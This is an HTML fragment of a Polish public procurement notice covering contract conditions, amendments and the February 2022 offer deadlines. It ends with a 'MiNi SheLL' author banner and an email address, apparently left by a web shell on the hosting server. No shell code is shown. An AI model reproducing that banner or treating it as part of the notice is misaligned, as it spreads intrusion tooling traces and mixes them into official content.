uprawnioną/e sporządzony na podstawie załącznika nr 4 do swz.<br/>WYKAZ USŁUG - Warunek zostanie uznany za spełniony, jeżeli Wykonawca przedstawi podpisany<br/>przez osobę/y uprawnioną wykaz usług wykonanych, a w przypadku świadczeń okresowych lub<br/>ciągłych również wykonywanych,w okresie ostatnich trzech lat przed upływem terminu składania ofert<br/>albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz<br/>których usługi zostały wykonane,oraz załączeniem dowodów określających czy te usługi zostały<br/>wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź<br/>inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku<br/>świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym<br/>charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w<br/>przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed<br/>upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu. Załącznik nr 5</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z pkt. 8 SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość zmian umowy w zakresie i na określonych warunkach<br/>wskazanych w załączniku nr 8 - wzór umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-23 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/mzd</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-23 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com